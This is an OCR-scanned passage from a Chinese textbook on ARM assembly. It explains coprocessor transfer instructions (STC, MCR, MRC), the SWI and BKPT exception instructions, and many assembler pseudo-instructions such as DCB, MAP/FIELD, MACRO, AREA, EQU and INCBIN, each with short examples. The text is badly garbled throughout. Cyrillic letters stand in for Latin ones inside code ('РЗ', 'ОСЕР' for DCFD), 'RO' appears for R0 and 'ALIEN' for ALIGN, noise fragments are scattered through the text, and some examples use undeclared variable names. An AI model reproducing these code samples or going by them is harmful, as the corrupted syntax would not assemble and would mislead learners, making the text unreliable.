传送 操作 ， 则 产生 未 定义 指令 异常 。 其 中 ， 亿 } 选 项 表示 指令 为 长 读 取 操 作 ， 如 用 于 双 精 度数 据 的 传输 。 
指令 示例 : 
STC РЗ, C4, [RO]; 将 协 处 理 器 РЗ 的 寄存 器 C4 中 的 字数 据 传送 到 ARM 处 理 器 的 寄存 器 RO 所 指向 的 存储 器 中 
(4) MCR 指令 
MCR 指令 的 格式 为 : 
MCR{ 条 件 } 协 处 理 器 编码 ， 协 处 理 器 操作 码 1， 源 寄存 器 ， 目 的 寄存 器 1， 目 的 寄存 器 2， 协 处 理 器 操作 码 2 
MCR 指令 用 于 将 АКМ 处 理 器 寄存 器 中 的 数据 传送 到 协 处 理 器 寄存 器 中 , 若 协 处 理 器 不 能 成 功 完成 操 
作 ， 则 产生 未 定义 指令 异常 。 其 中 协 处 理 器 操作 码 1 和 协 处 理 器 操作 码 2 为 协 处 理 器 将 要 执行 的 操作 ， 源 
寄存 器 为 ARM 处 理 器 的 寄存 器 ， 目 的 寄存 器 1 和 目的 寄存 器 2 均 为 协 处 理 器 的 寄存 器 。 
指令 示例 : 
MCR РЗ, 3, RO, C4, C5, 6 ; 该 指令 将 ARM 处 理 器 寄存 器 RO 中 的 数据 传送 到 协 处 理 器 РЗ 的 寄存 器 CA 和 C5 中 
(5) MRC 指令 
MRC 指令 的 格式 为 : 
MRC{ 条 件 } 协 处 理 器 编码 ， 协 处 理 器 操作 码 1， 目 的 寄存 器 , 源 寄存 器 1， 源 寄存 器 2， 协 处 理 器 操作 码 2 
MRC 指令 用 于 将 协 处 理 器 寄存 器 中 的 数据 传送 到 ARM 处 理 器 寄存 器 中 ， 若 协 处 理 器 不 能 成 功 完成 操 
作 ， 则 产生 未 定义 指令 异常 。 其 中 ， 协 处 理 器 操作 码 1 和 协 处 理 器 操作 码 2 为 协 处 理 器 将 要 执行 的 操作 ， 
目的 寄存 器 为 ARM 处 理 器 的 寄存 器 ， 源 寄存 器 1 和 源 寄 存 器 2 均 为 协 处 理 器 的 寄存 器 。 
指令 示例 : 
MRC P3, 3, RO, C4, C5, 6 ; 该 指令 将 协 处 理 器 P3 的 寄存 器 中 的 数据 传送 到 ARM 处 理 器 寄存 器 中 


10. 异常 产生 指令 


ARM 微 处 理 器 所 支持 的 异常 指令 有 如 下 两 条 。 

о SWI: 软件 中 断 指令 。 

O BKPT: 断 点 中 断 指令 。 

(1) SWI 指令 

SWI 指令 的 格式 为 : 

SWI{ 条 件 } 24 位 的 立即 数 

SWI 指令 用 于 产生 软件 中 断 ， 以 便 用 户 程序 能 调用 操作 系统 的 系统 例 程 。 操 作 系统 在 SWI 的 异常 处 理 
程序 中 提供 相应 的 系统 服务 ， 指 令 中 24 位 的 立即 数 指定 用 户 程序 调用 系统 例 程 的 类 型 ， 相 关 参 数 通 过 调用 
寄存 器 传递 ， 当 指令 中 24 位 的 立即 数 被 忽略 时 ， 用 户 程序 调用 系统 例 程 的 类 型 由 通用 寄存 器 R0 的 内 容 决 
定 ， 同 时 ， 参 数 通过 其 他 通用 寄存 器 传递 。 
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指令 示例 : 
SWI 0x02 ; 该 指令 调用 操作 系统 编号 位 02 的 系统 例 程 
(2) BKPT 指令 


BKPT 指令 的 格式 为 : 
BKPT 16 位 的 立即 数 


BKPT 指令 产生 软件 断 点 中 断 ， 可 用 于 程序 的 调试 。 
16.4 ARM 程序 设计 基础 


GRE 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 16 HARM 程序 设计 基础 .avi 

ARM 编译 器 一 般 都 支持 汇编 语言 的 程序 设计 、C/C++ 语 言 的 程序 设计 以 及 两 者 的 混合 编程 。 本 节 将 介 
# ARM 程序 设计 的 一 些 基 本 概念 ， 如 ARM 汇编 语言 的 伪 指 令 、 汇 编 语言 的 语句 格式 和 汇编 语言 的 程序 结 
构 等 ， 同 时 介绍 CC++ 和 汇编 语言 的 混合 编程 等 问题 。 


16.4.1 ARM 汇编 器 所 支持 的 伪 指 令 


在 ARM 汇编 语言 程序 里 ， 有 一 些 特殊 指令 助 记 符 ， 这 些 助 记 符 与 指令 系统 的 助 记 符 不 同 ， 没 有 相对 应 
的 操作 码 ， 通 常 称 这 些 特殊 指令 助 记 符 为 伪 指 令 ， 再 伪 指 令 完成 的 操作 称 为 伪 操 作 。 伪 指令 在 源 程 序 中 的 
作用 是 为 完成 汇编 程序 作 各 种 准备 工作 ， 这 些 伪 指令 仅 在 汇编 过 程 中 起 作用 ， 一 旦 汇编 结束 ， 伪 指令 的 使 
命 就 完成 了 。 

在 ARM 的 汇编 程序 中 ， 有 如 下 儿 种 伪 指 令 : 符号 定义 伪 指 令 、 数 据 定义 伪 指 令 、 汇 编 控 制 伪 指 令 、 宏 
指令 以 及 其 他 伪 指 令 。 

1. 符号 定义 (Symbol Definition) 伪 指令 

符号 定义 伪 指 令 用 于 定义 ARM 汇编 程序 中 的 变量 、 对 变量 赋值 以 及 定义 寄存 器 的 别名 等 操作 。 在 现实 
应 用 中 ， 有 如 下 儿 种 常见 的 符号 定义 伪 指 令 。 

口 用 于 定义 全 局 变量 的 GBLA、GBLL 和 GBLS。 

口 用 于 定义 局 部 变量 的 LCLA、LCLL 和 LCLS。 

口 用 于 对 变量 赋值 的 SETA、SETL 和 SETS。 

О 为 通用 寄存 器 列表 定义 名 称 的 RLIST。 

(1) GBLA、GBLL 和 GBLS 

语法 格式 : 

GBLA (GBLL 或 GBLS) 全 局 变量 名 

GBLA、GBLL 和 GBLS 伪 指 令 用 于 定义 一 个 ARM 程序 中 的 全 局 变量 ， 并 将 其 初始 化 。 具 体 说 明 如 下 

О GBLA 伪 指令 用 于 定义 一 个 全 局 的 数字 变量 ， 并 初始 化 为 0。 

о GBLL 伪 指令 用 于 定义 一 个 全 局 的 逻辑 变量 ， 并 初始 化 为 F( 假 〉。 

O _GBLS 伪 指令 用 于 定义 一 个 全 局 的 字符 串 变量 ， 并 初始 化 为 空 。 

由 于 以 上 3 条 伪 指 令 用 于 定义 全 局 变量 ， 因 此 在 整个 程序 范围 内 变量 名 必须 唯一 

使 用 示例 : 

GBLA Test! ; 定义 一 个 全 局 的 数字 变量 ， 变 量 名 为 Test1 
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Test SETA Oxaa ; 将 该 变量 赋值 为 0xaa 
GBLL Test2 ; 定义 一 个 全 局 的 逻辑 变量 ， 变 量 名 为 Test2 
Test2 SETL {TRUE} ; 将 该 变量 赋值 为 真 
GBLS Test3 ; 定义 一 个 全 局 的 字符 串 变量 ， 变 量 名 为 Test3 
Test3 SETS "Testing" ; 将 该 变量 赋值 为 Testing 
(2) LCLA、LCLL fil LCLS 
语法 格式 : 
LCLA (LCLL 或 LCLS) 局 部 变量 名 
LCLA、LCLL 和 LCLS 伪 指 令 用 于 定义 一 个 ARM 程序 中 的 局 部 变量 ， 并 将 其 初始 化 。 具 体 说 明 如 下 


所 示 。 


О LCLA 伪 指令 用 于 定义 一 个 局 部 的 数字 变量 ， 并 初始 化 为 0。 

о LCLL 伪 指令 用 于 定义 一 个 局 部 的 逻辑 变量 ， 并 初始 化 为 F〈 假 》。 

O LCLS 伪 指令 用 于 定义 一 个 局 部 的 字符 串 变 量 ， 并 初始 化 为 空 。 

以 上 3 条 伪 指 令 用 于 声明 局 部 变量 ， 在 其 作用 范围 内 变量 名 必须 唯一 。 

使 用 示例 : 

LCLA Test4 ; 声明 一 个 局 部 的 数字 变量 ， 变 量 名 为 Test4 

Test3 SETA Oxaa ; 将 该 变量 赋值 为 0xaa 

LCLL Test5 ; 声明 一 个 局 部 的 逻辑 变量 ， 变 量 名 为 Test5 

Test4 SETL {TRUE} ; 将 该 变量 赋值 为 真 

LCLS Test6 ; 定义 一 个 局 部 的 字符 串 变量 ， 变 量 名 为 Test6 

Test6 SETS "Testing"; 将 该 变量 赋值 为 Testing 

(3) SETA、SETL 和 SETS 

语法 格式 : 

变量 名 SETA (SETL 或 SETS) 表达 式 

伪 指 令 SETA, SETL 和 SETS 用 于 给 一 个 已 经 定义 的 全 局 变量 或 局 部 变量 赋值 。 具 体 说 明 如 下 所 示 。 
口 SETA 伪 指令 用 于 给 一 个 数学 变量 赋值 。 

O SETL 伪 指令 用 于 给 一 个 逻辑 变量 赋值 。 

О SETS 伪 指令 用 于 给 一 个 字符 串 变量 赋值 。 

其 中 ， 变 量 名 为 已 经 定义 过 的 全 局 变量 或 局 部 变量 ， 表 达 式 为 将 要 赋 给 变量 的 值 。 
使 用 示例 : 

LCLA Test3 ; 声明 一 个 局 部 的 数字 变量 ， 变 量 名 为 Test3 

Test3 SETA 0xaa ; 将 该 变量 赋值 为 0xaa 

LCLL Test4 ; 声明 一 个 局 部 的 逻辑 变量 ， 变 量 名 为 Test4 

Test4 SETL {TRUE} ; 将 该 变量 赋值 为 真 

(4) RLIST 

语法 格式 : 

名 称 RLIST {寄存 器 列表 } 

RLIST 伪 指 令 可 用 于 对 一 个 通用 寄存 器 列表 定义 名 称 ， 使 用 该 伪 指 令 定义 的 名 称 可 在 ARM 指令 


LDM/STM 中 使 用 。 在 LDM/STM 指令 中 ,列表 中 的 寄存 器 访问 次 序 为 根据 寄存 器 的 编号 由 低 到 高 ， 与 列表 
中 的 寄存 器 排列 次 序 无 关 。 


使 用 示例 : 
RegList RLIST (R0-R5, R8, R10) ; 将 寄存 器 列表 名 称 定 义 为 RegList， 可 在 ARM 指令 LDM/STM 中 通过 该 名 称 
访问 寄存 器 列表 


e 


2. 数据 定义 (Data Definition ) 伪 指令 


数据 定义 伪 指 令 一 般 用 于 为 特定 的 数据 分 配 存储 单元 ， 同 时 可 完成 已 分 配 存 储 单元 的 初始 化 。 在 现实 
应 用 中 ， 有 如 下 几 种 常见 的 数据 定义 伪 指 令 。 


口 DCB: 用 于 分 配 一 片 连续 的 字 节 存储 单元 并 用 指定 的 数据 初始 化 。 

口 DCW (DCWU) : 用 于 分 配 一 片 连续 的 半 字 存储 单元 并 用 指定 的 数据 初始 化 。 

口 DCD (DCDU) : 用 于 分 配 一 片 连续 的 字 存 储 单元 并 用 指定 的 数据 初始 化 。 

口 DCFD (DCFDU) : 用 于 为 双 精 度 的 浮 点 数 分 配 一 片 连续 的 字 存 储 单元 并 用 指定 的 数据 初始 化 。 
口 DCFS (DCFSU) : 用 于 为 单 精 度 的 浮 点 数 分 配 一 片 连续 的 字 存 储 单元 并 用 指定 的 数据 初始 化 。 
а DCQ (DCQU) : 用 于 分 配 一 片 以 8 字 节 为 单位 的 连续 存储 单元 并 用 指定 的 数据 初始 化 。 

口 SPACE: 用 于 分 配 一 片 连续 的 存储 单元 。 

口 MAP: 用 于 定义 一 个 结构 化 的 内 存 表 首 地 址 。 

口 FIELD: 用 于 定义 一 个 结构 化 的 内 存 表 的 数据 域 。 

(1) DCB 

语法 格式 : 

标号 DCB 表达 式 


DCB 伪 指 令 用 于 分 配 一 片 连续 的 字 节 存储 单元 并 用 伪 指 令 中 指定 的 表达 式 初始 化 。 其 中 ， 表 达 式 可 以 
是 0 一 255 的 数字 或 字符 串 。DCB 也 可 用 “=” 代 替 。 

使 用 示例 : 

Str DCB "This is a test! " ; 分 配 一 片 连续 的 字 节 存储 单元 并 初始 化 

(2) DCW (或 DCWU) 

语法 格式 : 

标号 DCW (或 DCWU) 表达 式 

DCW (或 DCWU ) 伪 指 令 用 于 分 配 一 片 连续 的 半 字 存储 单元 并 用 伪 指令 中 指定 的 表达 式 初 始 化 。 其 中 ， 
表达 式 可 以 为 程序 标号 或 数字 表达 式 。 用 DCW 分 配 的 字 存 储 单元 是 半 字 对 齐 的， 而 用 ОСМО 分 配 的 字 存 
储 单元 并 不 严格 半 字 对 齐 。 

使 用 示例 : 

DataTest DCW 1, 2, 3 ; 分 配 一 片 连续 的 半 字 存 储 单元 并 初始 化 

(3) DCD (或 DCDU) 

语法 格式 : 

标号 DCD (或 DCDU) 表达 式 

DCD (或 DCDU) 伪 指 令 用 于 分 配 一 片 连续 的 字 存 储 单元 并 用 伪 指 令 中 指定 的 表达 式 初始 化 。 其 中 ， 
表达 式 可 以 为 程序 标号 或 数字 表达 式 。DCD 也 可 用 “有 ”代替 。 

用 DCD 分 配 的 字 存 储 单元 是 字 对 齐 的 ， 而 用 DCDU 分 配 的 字 存 储 单元 并 不 严格 字 对 齐 。 

使 用 示例 : 

DataTest DCD 4, 5, 6; 分 配 一 片 连续 的 字 存储 单元 并 初始 化 

(4) DCFD (或 DCFDU) 

语法 格式 : 

标号 DCFD (或 DCFDU) 表达 式 

DCFD (或 DCFDU) 伪 指 令 用 于 为 双 精 度 的 浮 点 数 分 配 一 片 连续 的 字 存 储 单元 并 用 伪 指 令 中 指定 的 表 
达 式 初始 化 。 每 个 双 精度 的 浮 点 数 占据 两 个 字 单 元 。 用 DCFD 分 配 的 字 存 储 单元 是 字 对 齐 的 ， 而 用 DCFDU 
分 配 的 字 存 储 单元 并 不 严格 字 对 齐 。 
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FDataTest ОСЕР 2E115, -5E7 ; 分 配 一 片 连续 的 字 存 储 单元 并 初始 化 为 指定 的 双 精度 数 

(5) DCFS (或 DCFSU) 

语法 格式 : 

标号 DCFS (或 DCFSU) 表达 式 

DCFS (EÈ DCFSU) 伪 指 令 用 于 为 单 精度 的 浮 点 数 分 配 一 片 连续 的 字 存储 单元 并 用 伪 指令 中 指定 的 表达 
式 初始 化 。 每 个 单 精度 的 浮 点 数 占据 一 个 字 单 元 。 

用 DCFS 分 配 的 字 存 储 单元 是 字 对 齐 的 ， 而 用 DCFSU 分 配 的 字 存 储 单元 并 不 严格 字 对 齐 。 

使 用 示例 : 

FDataTest DCFS 2E5, -5E-7 ; 分 配 一 片 连续 的 字 存储 单元 并 初始 化 为 指定 的 单 精度 数 

(6) DCQ (或 DCQU) 

语法 格式 : 

标号 DCQ (或 DCQU) 表达 式 

ОСО (或 DCQU) 伪 指 令 用 于 分 配 一 片 以 8 个 字 节 为 单位 的 连续 存储 区 域 并 用 伪 指 令 中 指定 的 表达 式 
初始 化 。 用 DCQ 分 配 的 存储 单元 是 字 对 齐 的 ， 而 用 ОСОО 分 配 的 存储 单元 并 不 严格 字 对 齐 。 

使 用 示例 : 

DataTest ОСО 100 ; 分 配 一 片 连续 的 存储 单元 并 初始 化 为 指定 的 值 

(7) SPACE 

语法 格式 : 

标号 SPACE 表达 式 

SPACE 伪 指 令 用 于 分 配 一 片 连续 的 存储 区 域 并 初始 化 为 0。 其 中 ， 表 达 式 为 要 分 配 的 字 节 数 。SPACE 
也 可 用 “%” 代 替 。 

使 用 示例 : 

DataSpace SPACE 100 ; 分 配 连 续 100 字 节 的 存储 单元 并 初始 化 为 0 

(8) MAP 

语法 格式 : 

МАР 表达 式 {， 基 址 寄存 器 } 

MAP 伪 指令 用 于 定义 一 个 结构 化 的 内 存 表 的 首 地 址 。MAP 也 可 用 ““ ”代替 。 表 达 式 可 以 为 程序 中 的 
标号 或 数学 表达 式 ， 基 址 寄存 器 为 可 选项 ， 当 基 址 寄存 器 选项 不 存在 时 ， 表 达 式 的 值 即 为 内 存 表 的 首 地 址 ， 
当 该 选项 存在 时 ， 内 存 表 的 首 地 址 为 表达 式 的 值 与 基 址 寄存 器 的 和 。 

MAP 伪 指令 通常 与 FIELD 伪 指 令 配合 使 用 来 定义 结构 化 的 内 存 表 。 

使 用 示例 : 

MAP 0x100, RO; 定义 结构 化 内 存 表 首 地 址 的 值 为 0x100+RO 

(9) FIELD 

语法 格式 : 

标号 FIELD 表达 式 

FIELD 伪 指令 用 于 定义 一 个 结构 化 内 存 表 中 的 数据 域 。FIELD 也 可 用 “#” 代 替 。 表 达 式 的 值 为 当前 数 
据 域 在 内 存 表 中 所 占 的 字 节 数 。 

FIELD 伪 指 令 常 与 MAP 伪 指 令 配合 使 用 来 定义 结构 化 的 内 存 表 。MAP 伪 指 令 定义 内 存 表 的 首 地 址 ， 
FIELD 伪 指令 定义 内 存 表 中 的 各 个 数据 域 ， 并 可 以 为 每 个 数据 域 指定 一 个 标号 供 其 他 的 指令 引用 。 


注意 : MAP 和 FIELD 伪 指令 仅 用 于 定义 数据 结构 ， 并 不 实际 分 配 存储 单元 。 
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使 用 示例 : 

MAP 0x100 ; 定义 结构 化 内 存 表 首 地 址 的 值 为 0x100 
AFIELD 16; 定义 A 的 长 度 为 16 字 节 ， 位 置 为 0x100 
B FIELD 32; 定义 B 的 长 度 为 32 字 节 ， 位 置 为 0x110 
SFIELD256; ”定义 S 的 长 度 为 256 字 节 ， 位 置 为 0x130 


3. 汇编 控制 (Assembly Control) 伪 指 令 


汇编 控制 伪 指 令 用 于 控制 汇编 程序 的 执行 流程 ， 常 用 的 汇编 控制 伪 指令 如 下 所 示 。 
口 IF, ELSE, ENDIF 
口 WHILE, WEND 
Q MACRO, MEND 
口 MEXIT 
(1) IF、ELSE、ENDIF 
语法 格式 : 
IF 逻辑 表达 式 
指令 序列 1 
ELSE 
指令 序列 2 
ENDIF 
IF, ELSE, ENDIF 伪 指 令 能 根据 条 件 的 成 立 与 否决 定 是 否 执行 某 个 指令 序列 。 当 IF 后 面 的 逻辑 表达 式 
为 真 ， 则 执行 指令 序列 1， 否 则 执行 指令 序列 2。 其 中 ，ELSE 及 指令 序列 2 可 以 没有 ， 此 时 ， 当 IF 后 面 的 
逻辑 表达 式 为 真 ， 则 执行 指令 序列 1， 否 则 继续 执行 后 面 的 指令 。 
IF, ELSE, ENDIF 伪 指 令 可 以 嵌 套 使 用 。 
使 用 示例 : 
GBLL Test; 声明 一 个 全 局 的 逻辑 变量 ， 变 量 名 为 Test 


IF Test = TRUE 

指令 序列 1 
ELSE 

指令 序列 2 
ENDIF 
(2) WHILE、WEND 
语法 格式 : 
WHILE FRAR 

指令 序列 
WEND 
WHILE, WEND 伪 指 令 能 根据 条 件 的 成 立 与 否决 定 是 否 循环 执行 某 个 指令 序列 。 当 WHILE 后 面 的 逻 
辑 表 达 式 为 真 ， 则 执行 指令 序列 ， 该 指令 序列 执行 完毕 后 ， 再 判断 逻辑 表达 式 的 值 ， 若 为 真 则 继续 执行 ， 
-直到 逻辑 表达 式 的 值 为 假 。 

WHILE, WEND (WR n] UREE 2 
使 用 示例 : 
GBLA Counter ; 声明 一 个 全 局 的 数学 变量 ， 变 量 名 为 Counter 
Counter SETA 3; 由 变量 Counter 控制 循环 次 数 


WHILE Counter < 10 
指令 序列 


UU Android see jo ERR 


WEND 
(3) MACRO, MEND 

语法 格式 : 

SRS тА $ 参 数 1, 9 参数 2，… 
指令 序列 

MEND 


MACRO, MEND 伪 指 令 可 以 将 一 段 代码 定 义 为 一 个 整体 ， 称 为 宏 指令 ， 然 后 就 可 以 在 程序 中 通过 宏 指 
令 多 次 调用 该 段 代 码 。 其 中 ，“S$” 标 号 在 宏 指 令 被 展开 时 ， 会 被 替换 为 用 户 定义 的 符号 ， 


-个 或 多 个 参数 ， 当 宏 指 令 被 展开 时 ， 这 些 参 数 被 相应 的 值 蔡 换 。 


宏 指 令 的 使 用 方式 和 功能 与 子 程序 有 些 相似 ， 子 程序 可 以 提供 模块 化 的 程序 设计 、 节 省 存储 空间 并 提 
高 运行 速度 。 但 在 使 用 子 程序 结构 时 需要 保护 现场 ， 从 而 增加 了 系统 的 开销 ， 因 此 ， 在 代码 较 短 且 需 要 传 


递 的 参数 较 多 时 ， 可 以 使 用 宏 指 令 代替 子 程序 。 


包含 在 MACRO 和 MEND 之 间 的 指令 序列 称 为 宏 定义 体 ， 在 宏 定义 体 的 第 一 行 应 声明 宏 的 原型 (包含 
宏 名 、 所 需 的 参数 ) ， 然 后 就 可 以 在 汇编 程序 中 通过 宏 名 来 调用 该 指令 序列 。 在 源 程序 被 编译 时 ， 汇 编 器 
将 宏 调 用 展开 ， 用 宏 定 义 中 的 指令 序列 代替 程序 中 的 宏 调用 ， 并 将 实际 参数 的 值 传 递 给 宏 定 义 中 的 形式 参 


数 。MACRO、MEND 伪 指令 可 以 嵌 套 使 用 。 
(4) MEXIT 
语法 格式 : 
MEXIT 
MEXIT 用 于 从 宏 定 义 中 跳 转 出 去 。 


4. 其 他 常用 的 伪 指 令 


在 汇编 程序 中 经 常会 使 用 其 他 的 伪 指令 ， 有 具体 说 明 如 下 所 示 。 
AREA 

ALIGN 
CODE16、CODE32 
ENTRY 

END 

EQU 

EXPORT (或 GLOBAL) 
IMPORT 

EXTERN 

GET (或 INCLUDE) 
INCBIN 

RN 

ROUT 

(1) AREA 

语法 格式 : 

AREA E 属性 1, 属性 2,… 


DODOCOCODDDODCDIDUO 


AREA 伪 指 令 用 于 定义 一 个 代码 段 或 数据 段 。 其 中 ， 段 名 若 以 数字 开头 ， 则 该 段 名 需 用 “|” 括 起 来 ， 


例如 |1_test|。 


属性 字段 表示 该 代码 段 〈 或 数据 段 ) 的 相关 属性 ， 多 个 属性 用 逗号 分 隔 ， 常 用 的 属性 如 下 。 


O CODE 属 性 : 用 于 定义 代码 段 ， 默 认为 READONLY。 
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DATA 属 性 : 用 于 定义 数据 段 ， 默 认为 READWRITE。 
READONLY 属 性 : 指定 本 段 为 只 读 ， 代 码 段 默认 为 READONLY。 
READWRITE 属 性 : 指定 本 段 为 可 读 可 写 ， 数 据 段 的 默认 属性 为 READWRITE。 
ALIGN 属 性 : 使 用 方式 为 “ALIGN 表达 式 ”。 在 默认 时 ，ELF (可 执行 连接 文件 ) 的 代码 段 和 数 
据 段 是 按 字 对 齐 的 ， 表 达 式 的 取 值 范围 为 0 一 31。 
о COMMON 属 性 : 该 属性 定义 一 个 通用 的 段 ， 不 包含 任何 用 户 代 码 和 数据 。 各 源 文件 中 同名 的 
COMMON 有 段 共享 同一 段 存储 单元 。 
-个 汇编 语言 程序 至 少 要 包含 一 个 段 ， 当 程序 太 长 时 ， 也 可 以 将 程序 分 为 多 个 代码 段 和 数据 段 。 

使 用 示例 : 

AREA Init, CODE, READONLY 

指令 序列 

; 该 伪 指令 定义 了 一 个 代码 段 ， 段 名 为 Init， 属 性 为 只 读 

(2) ALIGN 

语法 格式 : 

ALIGN {表达 式 {, 偏 移 量 }} 

ALIGN 伪 指 令 可 通过 添加 填充 字 节 的 方式 ， 使 当前 位 置 满足 一 定 的 对 齐 方式 。 其 中 ， 表 达 式 的 值 用 于 
指定 对 齐 方式 ， 可 能 的 取 值 为 2 的 突 ， 如 1、2、4、8、16 等 。 若 未 指定 表达 式 ， 则 将 当前 位 置 对 齐 到 下 一 
个 字 的 位 置 。 偏 移 量 也 为 一 个 数字 表达 式 ， 若 使 用 该 字段 ， 则 当前 位 置 的 对 齐 方式 为 : 2 的 表达 式 次 寡 十 偏 
移 量 。 

使 用 示例 : 

AREA Init, CODE, READONLY, ALIEN=3 ; 指定 后 面 的 指令 为 8 字 节 对 齐 。 


指令 序列 
END 


(3) CODE16、 CODE32 

语法 格式 : 

CODE16 (或 CODE32) 

CODE16 伪 指 令 通知 编译 器 ， 其 后 的 指令 序列 为 16 位 的 Thumb 指令 。CODE32 伪 指 令 通 知 编译 器 ， 其 
后 的 指令 序列 为 32 位 的 ARM 指令 。 

若 在 汇编 源 程序 中 同时 包含 ARM 指令 和 Thumb 指令 时 ， 可 用 CODE16 伪 指 令 通知 编译 器 其 后 的 指令 
序列 为 16 位 的 Thumb 指令 ，CODE32 伪 指 令 通 知 编译 器 其 后 的 指令 序列 为 32 位 的 ARM 指令 。 因 此 ， 在 
使 用 ARM 指令 和 Thumb 指令 混合 编程 的 代码 里 ， 可 用 这 两 条 伪 指 令 进行 切换 ， 但 注意 它们 只 通知 编译 器 
其 后 指令 的 类 型 ， 并 不 能 对 处 理 器 进行 状态 的 切换 。 

使 用 示例 : 

AREA Init, CODE, READONLY 


oooo 


CODE32 ; 通知 编译 器 其 后 的 指令 为 32 位 的 ARM 指令 
LDR RO, =NEXT+1 ; 将 跳 转 地 址 放 入 寄存 器 RO 
BX КО; 程序 跳 转 到 新 的 位 置 执行 ， 并 将 处 理 器 切换 到 Thumb 工作 状态 


CODE16 ; 通知 编译 器 其 后 的 指令 为 16 位 的 Thumb 指令 
NEXT LDR R3, =0x3FF 


END ; 程序 结束 
(4) ENTRY 
语法 格式 : 


469 


te 


RAO ERRARE 


ENTRY 

ENTRY 伪 指 令 用 于 指定 汇编 程序 的 入 口 点 。 在 一 个 完整 的 汇编 程序 中 至 少 要 有 一 个 ENTRY (也 可 以 
有 多 个 , 当 有 多 个 ENTRY 时 ,程序 的 真正 入 口 点 由 链接 器 指定 ), 但 在 一 个 源 文件 里 最 多 只 能 有 一 个 ENTRY 
〈 可 以 没有 ) 。 

使 用 示例 : 

AREA Init, CODE, READONLY 

ENTRY ; 指定 应 用 程序 的 入 口 点 


(5) END 

语法 格式 : 

END 

END 伪 指 令 用 于 通知 编译 器 已 经 到 了 源 程序 的 结尾 。 
使 用 示例 : 

AREA Init，CODE，READONLY 


END ; 指定 应 用 程序 的 结尾 

(6) EQU 

语法 格式 : 

名 称 EQU 表达 式 {， 类 型 } 

EQU 伪 指 令 用 于 为 程序 中 的 常量 、 标 号 等 定义 一 个 等 效 的 字符 名 称 ， 类 似 于 C 语言 中 的 #define。 其 中 ， 
EQU n] Jj **" (Cf. 

名 称 为 EQU 伪 指 令 定义 的 字符 名 称 ， 当 表达 式 为 32 位 的 常量 时 ， 可 以 指定 表达 式 的 数据 类 型 ， 可 以 
有 3 种 类 型 CODE16、CODE32 和 DATA. 

使 用 示例 : 

Test EQU 50 ; 定义 标号 Test 的 值 为 50 

Addr EQU 0x55, CODE32 ; 定义 Addr 的 值 为 0x55， 且 该 处 为 32 位 的 ARM 指令 

(7) EXPORT (EÈ GLOBAL) 

语法 格式 : 

EXPORT 标号 {IWEAK]} 

EXPORT 伪 指 令 用 于 在 程序 中 声明 一 个 全 局 的 标号 ， 该 标号 可 在 其 他 文件 中 引用 。EXPORT 可 用 
GLOBAL 代替 。 标 号 在 程序 中 区 分 大 小 写 ，[WEAKI] 选 项 声明 其 他 的 同名 标号 优先 于 该 标号 被 引用 。 

使 用 示例 : 

AREA Init, CODE, READONLY 

EXPORT Stest ; 声明 一 个 可 全 局 引用 的 标号 Stest 


END 
(8) IMPORT 

语法 格式 : 

IMPORT 标号 {IWEAK]} 

IMPORT 伪 指 令 用 于 通知 编译 器 要 使 用 的 标号 在 其 他 源 文件 中 定义 ， 但 要 在 当前 源 文件 中 引用 ， 而 且 
无 论 当前 源 文件 是 否 引用 该 标号 ， 该 标号 均 会 被 加 入 到 当前 源 文件 的 符号 表 中 。 

标号 在 程序 中 区 分 大 小 写 ，[WEAK] 选 项 表示 当 所 有 的 源 文件 都 没有 定义 这 样 一 个 标号 时 ， 编 译 器 也 不 
给 出 错误 信息 ， 在 多 数 情 况 下 将 该 标号 置 为 0， 若 该 标号 为 B 或 BL 指令 引用 ， 则 将 B 或 BL 指令 置 为 NOP 
操作 。 


(m, 


aioe лм сезаяж — 


使 用 示例 : 
AREA Init, CODE, READONLY 
IMPORT Main ; 通知 编译 器 当前 文件 要 引用 标号 Main, {8 Main 在 其 他 源 文 件 中 定义 


END 
(9) EXTERN 

语法 格式 : 

EXTERN 标号 {[WEAK]} 

EXTERN 伪 指 令 用 于 通知 编译 器 要 使 用 的 标号 在 其 他 源 文件 中 定义 ， 但 要 在 当前 源 文件 中 引用 ， 如 果 
当前 源 文 件 实际 并 未 引用 该 标号 ， 该 标号 就 不 会 被 加 入 到 当前 源 文 件 的 符号 表 中 。 

标号 在 程序 中 区 分 大 小 写 ，[WEAKI] 选 项 表示 当 所 有 的 源 文件 都 没有 定义 这 样 一 个 标号 时 ， 编 译 器 也 不 
给 出 错误 信息 ， 在 多 数 情 况 下 将 该 标号 置 为 0， 若 该 标号 为 B 或 BL 指令 引用 , 则 将 B 或 BL 指令 置 为 NOP 
操作 。 

使 用 示例 : 

AREA Init, CODE, READONLY 

EXTERN Main ; 通知 编译 器 当前 文件 要 引用 标号 Main, 18 Main 在 其 他 源 文件 中 定义 


END 

(10) GET (或 INCLUDE) 

语法 格式 : 

GET 文件 名 

GET 伪 指 令 用 于 将 一 个 源 文件 包含 到 当前 的 源 文件 中 , 并 将 被 包含 的 源 文件 在 当前 位 置 进 行 汇编 处 理 。 
可 以 使 用 INCLUDE 代替 GET。 

汇编 程序 中 常用 的 方法 是 在 某 源 文件 中 定义 一 些 宏 指 令 ， 用 EQU 定义 常量 的 符号 名 称 ， 用 MAP 和 
FIELD 定义 结构 化 的 数据 类 型 ， 然 后 用 GET 伪 指 令 将 这 个 源 文件 包含 到 其 他 的 源 文件 中 。 使 用 方法 与 C 语 
言 中 的 include ЖИД. СЕТ 伪 指 令 只 能 用 于 包含 源 文件 ， 包 含 目标 文件 需要 使 用 INCBIN 伪 指令 。 

使 用 示例 : 

AREA Init, CODE, READONLY 

GET al.s ; 通知 编译 器 当前 源 文件 包含 源 文 件 a1.s 

GE T C: \а2.5; 通知 编译 器 当前 源 文 件 包 含 源 文件 C:\ a2.s 


END 
(11) INCBIN 

诸 法 格式 : 

INCBIN 文件 名 

INCBIN 伪 指 令 用 于 将 一 个 目标 文件 或 数据 文件 包含 到 当前 的 源 文件 中 , 被 包含 的 文件 不 作 任何 变动 地 
存放 在 当前 文件 中 ， 编 译 器 从 其 后 开始 继续 处 理 。 

使 用 示例 : 

AREA Init, CODE, READONLY 

INCBIN a1.dat ; 通知 编译 器 当前 源 文 件 包含 文件 a1.dat 

INCBIN C:\a2.txt ; 通知 编译 器 当前 源 文 件 包含 文件 C:\a2.txt 


END 
(12) RN 


语法 格式 : 


еее 


名 称 RN 表达 式 

RN 伪 指 令 用 于 给 一 个 寄存 器 定义 一 个 别名 。 采用 这 种 方式 可 以 方便 程序 员 记 忆 该 寄存 器 的 功能 。 其中， 
名 称 为 给 寄存 器 定义 的 别名 ， 表 达 式 为 寄存 器 的 编码 。 

使 用 示例 : 

